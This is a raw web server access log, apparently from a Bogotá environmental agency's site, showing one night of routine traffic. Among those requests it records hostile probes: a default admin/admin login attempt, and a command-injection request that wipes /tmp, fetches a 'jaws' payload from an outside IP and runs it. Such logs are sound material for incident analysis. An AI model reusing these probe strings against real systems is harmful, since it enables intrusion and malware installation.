192.168.175.240 - - [24/Mar/2023:01:32:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:33:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:34:30 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [24/Mar/2023:01:35:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:01:33:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:01:35:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:34:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
66.249.70.180 - - [24/Mar/2023:01:36:10 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:01:36:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:36:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
157.55.39.217 - - [24/Mar/2023:01:37:04 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0618.pdf HTTP/1.1" 200 355991
192.168.175.240 - - [24/Mar/2023:01:37:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:37:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 503 1020
94.102.61.10 - - [24/Mar/2023:01:37:47 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110197
192.168.175.240 - - [24/Mar/2023:01:38:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:38:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
74.125.210.209 - - [24/Mar/2023:01:39:14 -0500] "GET /Publicaciones/SSFFS-08707-2021.zip HTTP/1.1" 404 232
192.168.175.240 - - [24/Mar/2023:01:39:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:39:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:01:40:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Mar/2023:01:40:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42871
201.245.192.253 - - [24/Mar/2023:01:40:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43324
192.168.175.240 - - [24/Mar/2023:01:40:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:39:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:01:41:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:40:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
192.168.175.240 - - [24/Mar/2023:01:42:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:43:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:44:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:44:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:01:45:02 -0500] "HEAD / HTTP/1.1" 200 -
178.79.164.56 - - [24/Mar/2023:01:45:29 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [24/Mar/2023:01:45:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:44:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58653
192.168.175.240 - - [24/Mar/2023:01:46:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:45:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:01:47:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:46:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54414
192.168.175.240 - - [24/Mar/2023:01:48:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:49:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:49:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
172.22.2.4 - - [24/Mar/2023:01:49:48 -0500] "GET /BLA/boletinlegal/Circulares/2012/Circular%20No.%204%20del%2019%20de%20abril%20de%202012.pdf HTTP/1.1" 304 -
216.245.221.92 - - [24/Mar/2023:01:50:02 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:01:50:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:51:30 -0500] "GET / HTTP/1.1" 200 4720
84.53.198.123 - - [24/Mar/2023:01:52:14 -0500] "GET /boaform/admin/formLogin?username=admin&psd=admin HTTP/1.0" 404 1019
192.168.175.240 - - [24/Mar/2023:01:52:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:51:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
190.84.108.224 - - [24/Mar/2023:01:52:53 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13502
66.249.70.182 - - [24/Mar/2023:01:52:58 -0500] "-" 408 -
190.84.108.224 - - [24/Mar/2023:01:53:00 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2015%2F HTTP/1.1" 200 580582
40.77.167.172 - - [24/Mar/2023:01:53:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/1786.pdf HTTP/1.1" 304 -
192.168.175.240 - - [24/Mar/2023:01:53:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:51:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
40.77.167.211 - - [24/Mar/2023:01:53:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0444.pdf HTTP/1.1" 200 616352
192.168.175.240 - - [24/Mar/2023:01:54:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:54:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:01:55:02 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.43 - - [24/Mar/2023:01:55:15 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:01:55:30 -0500] "GET / HTTP/1.1" 200 4720
66.249.64.215 - - [24/Mar/2023:01:56:06 -0500] "-" 408 -
52.167.144.156 - - [24/Mar/2023:01:56:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/2939.pdf HTTP/1.1" 200 379541
192.168.175.240 - - [24/Mar/2023:01:56:30 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.44 - - [24/Mar/2023:01:56:32 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [24/Mar/2023:01:57:30 -0500] "GET / HTTP/1.1" 200 4720
17.241.75.149 - - [24/Mar/2023:01:58:28 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:01:58:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:01:56:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:01:57:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [24/Mar/2023:01:59:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:01:59:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:02:00:02 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:00:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:01:30 -0500] "GET / HTTP/1.1" 200 4720
68.183.236.207 - - [24/Mar/2023:02:02:05 -0500] "\x16\x03\x01" 400 226
68.183.236.207 - - [24/Mar/2023:02:02:05 -0500] "\x16\x03\x01" 400 226
68.183.236.207 - - [24/Mar/2023:02:02:06 -0500] "GET / HTTP/1.1" 200 319
68.183.236.207 - - [24/Mar/2023:02:02:07 -0500] "GET /client/get_targets HTTP/1.1" 404 1018
68.183.236.207 - - [24/Mar/2023:02:02:07 -0500] "GET /upl.php HTTP/1.1" 404 1018
68.183.236.207 - - [24/Mar/2023:02:02:08 -0500] "GET /geoip/ HTTP/1.1" 404 1018
68.183.236.207 - - [24/Mar/2023:02:02:09 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [24/Mar/2023:02:02:30 -0500] "GET / HTTP/1.1" 200 4720
157.90.251.233 - - [24/Mar/2023:02:02:49 -0500] "GET / HTTP/1.1" 200 319
157.90.251.233 - - [24/Mar/2023:02:02:51 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:03:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:02:02:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:04:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:02:04:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:02:05:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:02:03:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
192.168.175.240 - - [24/Mar/2023:02:05:30 -0500] "GET / HTTP/1.1" 200 4720
34.90.4.102 - - [24/Mar/2023:02:05:54 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [24/Mar/2023:02:06:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:07:30 -0500] "GET / HTTP/1.1" 200 4720
34.147.67.40 - - [24/Mar/2023:02:08:02 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [24/Mar/2023:02:08:30 -0500] "GET / HTTP/1.1" 200 4720
34.91.116.112 - - [24/Mar/2023:02:08:38 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
34.147.68.14 - - [24/Mar/2023:02:09:06 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [24/Mar/2023:02:09:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:02:09:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
34.147.67.40 - - [24/Mar/2023:02:09:58 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
216.245.221.92 - - [24/Mar/2023:02:10:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:02:08:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:10:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:02:09:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
172.22.2.4 - - [24/Mar/2023:02:11:17 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
172.22.2.4 - - [24/Mar/2023:02:11:18 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%206%20del%2023%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 252800
192.168.175.240 - - [24/Mar/2023:02:11:30 -0500] "GET / HTTP/1.1" 200 4720
34.90.24.60 - - [24/Mar/2023:02:12:20 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
34.147.68.14 - - [24/Mar/2023:02:12:27 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
52.167.144.71 - - [24/Mar/2023:02:12:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5229.pdf HTTP/1.1" 200 882312
192.168.175.240 - - [24/Mar/2023:02:12:30 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.167 - - [24/Mar/2023:02:12:39 -0500] "GET /BLA/boletinlegal/Circulares/2020/CIRCULAR%20No.%2000019%20DEL%2018%20DE%20DICIEMBRE%20DEL%202020.pdf HTTP/1.1" 200 307959
34.147.68.14 - - [24/Mar/2023:02:12:56 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
34.147.67.40 - - [24/Mar/2023:02:13:30 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [24/Mar/2023:02:13:30 -0500] "GET / HTTP/1.1" 200 4720
192.133.77.18 - - [24/Mar/2023:02:14:05 -0500] "GET /images/Sello%201%20JA-2.jpeg HTTP/1.1" 200 42236
192.133.77.15 - - [24/Mar/2023:02:14:06 -0500] "GET /secretaria-de-ambiente-impone-sancion-por-puntos-de-obra-sin-permiso-en-el-humedal-tibabuyes.html HTTP/1.1" 200 990
192.168.175.240 - - [24/Mar/2023:02:14:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:02:14:32 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:02:15:02 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:15:30 -0500] "GET / HTTP/1.1" 200 4720
74.125.210.162 - - [24/Mar/2023:02:15:43 -0500] "GET /images/jardines-verticales_optimized.jpeg HTTP/1.1" 200 138197
172.22.2.4 - - [24/Mar/2023:02:14:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:16:30 -0500] "GET / HTTP/1.1" 200 4720
192.133.77.16 - - [24/Mar/2023:02:16:33 -0500] "GET /tinguas-azules-secretaria-de-ambiente-atiende-alto-numero-de-reportes-de-aves-migratorias.html HTTP/1.1" 200 923
192.133.77.17 - - [24/Mar/2023:02:16:34 -0500] "GET /images/foto%202.jpg HTTP/1.1" 200 63300
186.28.124.187 - - [24/Mar/2023:02:16:42 -0500] "GET /%C3%82%C2%BFquieres-aprender-sobre-jardines-verticales-esta-es-tu-oportunidad.html HTTP/1.1" 200 925
172.22.2.4 - - [24/Mar/2023:02:15:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [24/Mar/2023:02:17:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:18:30 -0500] "GET / HTTP/1.1" 200 4720
34.90.193.30 - - [24/Mar/2023:02:19:01 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
34.91.116.112 - - [24/Mar/2023:02:19:29 -0500] "GET /inventario-de-emisiones-2020-transporte-publico-sitp-redujo-emisiones-de-pm-2-5-en-un-37.html HTTP/1.1" 200 925
192.168.175.240 - - [24/Mar/2023:02:19:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:02:19:31 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:02:20:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Mar/2023:02:20:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42873
201.245.192.253 - - [24/Mar/2023:02:20:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43491
192.168.175.240 - - [24/Mar/2023:02:20:30 -0500] "GET / HTTP/1.1" 200 4720
191.156.56.61 - - [24/Mar/2023:02:20:50 -0500] "GET /inscribete-y-participa-en-las-caminatas-ecologicas-de-marzo.html HTTP/1.1" 200 924
192.168.175.240 - - [24/Mar/2023:02:21:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:02:20:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:22:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:02:21:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52316
192.168.175.240 - - [24/Mar/2023:02:23:30 -0500] "GET / HTTP/1.1" 200 4720
74.125.210.215 - - [24/Mar/2023:02:24:01 -0500] "GET /Publicaciones/SSFFS-08699-2021.zip HTTP/1.1" 404 232
192.168.175.240 - - [24/Mar/2023:02:24:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:02:24:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:02:25:02 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:25:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:26:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:27:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:02:26:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:28:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:02:26:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53551
192.168.175.240 - - [24/Mar/2023:02:29:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:02:29:30 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:02:30:02 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [24/Mar/2023:02:30:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42873
201.245.192.253 - - [24/Mar/2023:02:30:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43491
192.168.175.240 - - [24/Mar/2023:02:30:30 -0500] "GET / HTTP/1.1" 200 4720
193.151.146.61 - - [24/Mar/2023:02:31:28 -0500] "GET / HTTP/1.1" 200 319
192.168.175.240 - - [24/Mar/2023:02:31:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:32:30 -0500] "GET / HTTP/1.1" 200 4720
4.246.124.237 - - [24/Mar/2023:02:32:57 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera4G.jpg HTTP/1.1" 200 371145
192.168.175.240 - - [24/Mar/2023:02:33:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:02:31:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:02:32:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [24/Mar/2023:02:34:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:02:34:29 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
216.245.221.92 - - [24/Mar/2023:02:35:02 -0500] "HEAD / HTTP/1.1" 200 -
52.167.144.156 - - [24/Mar/2023:02:35:10 -0500] "GET /BLA/resoluciones/AUTOS%202016/3109.pdf HTTP/1.1" 200 435224
192.168.175.240 - - [24/Mar/2023:02:35:30 -0500] "GET / HTTP/1.1" 200 4720
52.167.144.167 - - [24/Mar/2023:02:36:28 -0500] "GET /Publicaciones/2022EE136332.pdf HTTP/1.1" 404 228
192.168.175.240 - - [24/Mar/2023:02:36:30 -0500] "GET / HTTP/1.1" 200 4720
17.241.227.49 - - [24/Mar/2023:02:37:03 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:02:37:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:38:30 -0500] "GET / HTTP/1.1" 200 4720
5.255.231.245 - - [24/Mar/2023:02:38:53 -0500] "GET / HTTP/1.1" 200 319
66.249.70.182 - - [24/Mar/2023:02:39:02 -0500] "-" 408 -
172.22.2.4 - - [24/Mar/2023:02:37:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [24/Mar/2023:02:39:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [24/Mar/2023:02:39:30 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [24/Mar/2023:02:40:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:02:38:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56744
201.245.192.253 - - [24/Mar/2023:02:40:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42873
201.245.192.253 - - [24/Mar/2023:02:40:19 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [24/Mar/2023:02:40:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43491
192.168.175.240 - - [24/Mar/2023:02:40:30 -0500] "GET / HTTP/1.1" 200 4720
4.246.124.237 - - [24/Mar/2023:02:41:00 -0500] "GET /galeria/galeria/fotos/Humedal-la-conejera4G.jpg HTTP/1.1" 200 371145
192.168.175.240 - - [24/Mar/2023:02:41:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:42:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:43:30 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.208 - - [24/Mar/2023:02:44:21 -0500] "GET /BLA/boletinlegal/Circulares/2011/Circular%20No.%208%20del%2020%20de%20Septiembre%20de%202011.pdf HTTP/1.1" 200 285158
201.245.192.253 - - [24/Mar/2023:02:44:27 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [24/Mar/2023:02:44:30 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [24/Mar/2023:02:45:02 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [24/Mar/2023:02:43:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:45:30 -0500] "GET / HTTP/1.1" 200 4720
74.125.210.212 - - [24/Mar/2023:02:45:49 -0500] "GET /Publicaciones/SSFFS-10882-2021.zip HTTP/1.1" 404 232
172.22.2.4 - - [24/Mar/2023:02:44:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59296
192.168.175.240 - - [24/Mar/2023:02:46:30 -0500] "GET / HTTP/1.1" 200 4720
66.249.70.180 - - [24/Mar/2023:02:46:30 -0500] "-" 408 -
192.168.175.240 - - [24/Mar/2023:02:47:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:48:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:02:49:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [24/Mar/2023:02:49:30 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [24/Mar/2023:02:50:02 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:50:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:02:49:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
191.92.180.45 - - [24/Mar/2023:02:51:06 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
192.168.175.240 - - [24/Mar/2023:02:51:30 -0500] "GET / HTTP/1.1" 200 4720
40.77.167.211 - - [24/Mar/2023:02:51:50 -0500] "GET /BLA/resoluciones/AUTOS%202017/1041.pdf HTTP/1.1" 200 311171
172.22.2.4 - - [24/Mar/2023:02:50:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57141
192.168.175.240 - - [24/Mar/2023:02:52:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:53:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:02:54:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [24/Mar/2023:02:54:30 -0500] "GET / HTTP/1.1" 200 4720
216.245.221.92 - - [24/Mar/2023:02:55:02 -0500] "HEAD / HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:55:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:02:56:30 -0500] "GET / HTTP/1.1" 200 4720
162.55.166.12 - - [24/Mar/2023:02:56:32 -0500] "GET / HTTP/1.1" 200 4720
162.55.166.12 - - [24/Mar/2023:02:56:34 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [24/Mar/2023:02:55:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:02:57:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:02:56:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
192.168.175.240 - - [24/Mar/2023:02:58:30 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [24/Mar/2023:02:59:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 41914
192.168.175.240 - - [24/Mar/2023:02:59:30 -0500] "GET / HTTP/1.1" 200 4720
64.124.8.48 - - [24/Mar/2023:02:59:41 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-273-11.docx HTTP/1.1" 304 -
191.92.180.45 - - [24/Mar/2023:03:00:00 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 200 1065
191.92.180.45 - - [24/Mar/2023:03:00:00 -0500] "GET /images/calidaddeaire1.png HTTP/1.1" 200 158614
216.245.221.92 - - [24/Mar/2023:03:00:02 -0500] "HEAD / HTTP/1.1" 200 -
69.171.249.7 - - [24/Mar/2023:03:00:13 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 206 1065
191.92.180.45 - - [24/Mar/2023:03:00:14 -0500] "GET /images/calidaddeaire1.png HTTP/1.1" 200 158614
69.171.249.2 - - [24/Mar/2023:03:00:14 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 206 1065
173.252.87.119 - - [24/Mar/2023:03:00:14 -0500] "GET /images/calidaddeaire1.png HTTP/1.1" 200 158614
192.168.175.240 - - [24/Mar/2023:03:00:30 -0500] "GET / HTTP/1.1" 200 4720
66.220.149.17 - - [24/Mar/2023:03:00:47 -0500] "GET /images/calidaddeaire1.png HTTP/1.1" 200 158614
69.171.249.120 - - [24/Mar/2023:03:00:47 -0500] "GET /distrito-declara-alerta-preventiva-en-el-suroccidente-de-la-ciudad-por-mala-calidad-del-aire.html HTTP/1.1" 206 1065
69.171.249.9 - - [24/Mar/2023:03:00:47 -0500] "GET /images/calidaddeaire1.png HTTP/1.1" 200 158614
173.252.83.3 - - [24/Mar/2023:03:00:53 -0500] "GET /images/calidaddeaire1.png HTTP/1.1" 200 158614
172.22.2.4 - - [24/Mar/2023:03:00:14 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 36811
173.252.83.9 - - [24/Mar/2023:03:01:18 -0500] "GET /images/calidaddeaire1.png HTTP/1.1" 200 158614
60.221.224.113 - - [24/Mar/2023:03:01:24 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
60.221.224.111 - - [24/Mar/2023:03:01:28 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
192.168.175.240 - - [24/Mar/2023:03:01:30 -0500] "GET / HTTP/1.1" 200 4720
192.168.175.240 - - [24/Mar/2023:03:02:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:03:01:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
192.168.175.240 - - [24/Mar/2023:03:03:30 -0500] "GET / HTTP/1.1" 200 4720
172.22.2.4 - - [24/Mar/2023:03:01:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55561
